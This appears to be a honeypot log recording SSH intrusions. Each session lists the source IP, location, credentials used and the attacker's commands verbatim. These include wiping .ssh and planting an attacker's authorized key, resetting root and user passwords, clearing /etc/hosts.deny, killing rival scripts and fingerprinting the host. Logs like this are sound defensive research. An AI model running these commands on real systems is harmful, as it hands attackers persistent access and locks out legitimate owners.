$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:qRCWbQpH6Z8c"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_71 (181.115.147.5) β€” Santa Cruz de la Sierra, Bolivia Β· 1 session Β· 19 cmds
2026-05-22 14:56 EDT Β· as root/Ss123123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:7IdRQ2Lw7TUt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 frost_root_11 (176.211.42.202) β€” Vladivostok, Russia Β· 1 session Β· 20 cmds
2026-05-22 14:45 EDT Β· as anas/anas
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "anas\nt72DPhc9TITI\nt72DPhc9TITI"|passwd|bash
$ Enter new UNIX password:
$ echo "anas\nt72DPhc9TITI\nt72DPhc9TITI\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_88 (69.5.20.232) β€” Banguntapan, Indonesia Β· 1 session Β· 19 cmds
2026-05-22 14:26 EDT Β· as root/1qaz!QAZ2wsx@WSX
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Zk1V2cPb9c03"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_89 (46.253.45.10) β€” Vilanova i la GeltrΓΊ, Spain Β· 2 sessions Β· 38 cmds
2026-05-22 13:47 EDT Β· as root/asdzxc123, root/password
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:8KKvD4rbcd6Z"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:SFI1tQYoXGvu"|chpasswd|bash
🎭 carnival_root_7 (187.16.96.250) β€” Rio de Janeiro, Brazil Β· 2 sessions Β· 38 cmds
2026-05-22 13:51 EDT Β· as root/asdzxc123, root/password
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:TpF35XliQsmb"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:GUQ15hTuhU8N"|chpasswd|bash
🎭 k-pop_root_16 (106.243.155.71) β€” Gangseo-gu, South Korea Β· 1 session Β· 20 cmds
2026-05-22 13:40 EDT Β· as ldap/P@ssw0rd
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "P@ssw0rd\nAUxsee5bHRoZ\nAUxsee5bHRoZ"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd\nAUxsee5bHRoZ\nAUxsee5bHRoZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_5 (14.18.88.70) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-05-22 13:30 EDT Β· as user1/user1123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "user1123\nwDvSXmalldBm\nwDvSXmalldBm"|passwd|bash
$ Enter new UNIX password:
$ echo "user1123\nwDvSXmalldBm\nwDvSXmalldBm\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_76 (103.75.183.177) β€” Thα»§ Đức, Vietnam Β· 1 session Β· 19 cmds
2026-05-22 12:59 EDT Β· as root/Password01
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:0urWCUbGN9mo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 monsoon_root_12 (47.247.99.155) β€” Navi Mumbai, India Β· 1 session Β· 19 cmds
2026-05-22 12:50 EDT Β· as root/Password01
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:kod9Vp6p77pH"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ramen_root_5 (160.251.233.37) β€” Chiyoda City, Japan Β· 3 sessions Β· 60 cmds
2026-05-21 12:24 EDT Β· as admin/zxcvbnm, mohammad/mohammad, socks/socks
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "mohammad\ncX8qmU1kZDsJ\ncX8qmU1kZDsJ"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "mohammad\ncX8qmU1kZDsJ\ncX8qmU1kZDsJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "socks\nxqZvM1AvS5yQ\nxqZvM1AvS5yQ"|passwd|bash
$ echo "socks\nxqZvM1AvS5yQ\nxqZvM1AvS5yQ\n"|passwd
$ echo -e "zxcvbnm\nfJ7lwH0rxDb3\nfJ7lwH0rxDb3"|passwd|bash
$ echo "zxcvbnm\nfJ7lwH0rxDb3\nfJ7lwH0rxDb3\n"|passwd
🎭 bike_sol (176.65.132.129) β€” Eygelshoven, The Netherlands Β· 7 sessions Β· 7 cmds
2026-05-10 23:08 EDT Β· as ftpuser/ftpuser, mc/123456, mohammad/mohammad
Ran uname 7x across 7 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—7
🎭 cipher_root_19 (223.17.5.126) β€” Tsing Yi, Hong Kong Β· 5 sessions Β· 100 cmds
2026-05-06 11:08 EDT Β· as arkserver/password, mohammad/mohammad, test/test2024!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "mohammad\nVIMTYUBvqMBL\nVIMTYUBvqMBL"|passwd|bash
$ Enter new UNIX password: Γ—5
$ echo "mohammad\nVIMTYUBvqMBL\nVIMTYUBvqMBL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "ubuntu\nMQLi2DMzMd26\nMQLi2DMzMd26"|passwd|bash
$ echo "ubuntu\nMQLi2DMzMd26\nMQLi2DMzMd26\n"|passwd
$ echo -e "123izma123\nXcoNhY2uKIfD\nXcoNhY2uKIfD"|passwd|bash
$ echo "123izma123\nXcoNhY2uKIfD\nXcoNhY2uKIfD\n"|passwd
$ echo -e "test2024!\nnNzem0KT5haC\nnNzem0KT5haC"|passwd|bash
$ echo "test2024!\nnNzem0KT5haC\nnNzem0KT5haC\n"|passwd
$ echo -e "password\nYqqOFPFAPUpW\nYqqOFPFAPUpW"|passwd|bash
$ echo "password\nYqqOFPFAPUpW\nYqqOFPFAPUpW\n"|passwd
🎭 shadow_root_68 (89.134.210.182) β€” Budapest, Hungary Β· 3 sessions Β· 59 cmds
2026-05-21 18:59 EDT Β· as ftpuser/ftpuser2025, root/admin1@3, tomcat/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123456\nveyUT3GKDYj3\nveyUT3GKDYj3"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nveyUT3GKDYj3\nveyUT3GKDYj3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "ftpuser2025\nGAXwzHds8qMc\nGAXwzHds8qMc"|passwd|bash
$ echo "ftpuser2025\nGAXwzHds8qMc\nGAXwzHds8qMc\n"|passwd
$ echo "root:te5QInLRg59r"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 strudel_root_10 (91.98.83.83) β€” Falkenstein, Germany Β· 2 sessions Β· 40 cmds
2026-05-22 11:58 EDT Β· as nokia/nokia123, tomcat/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
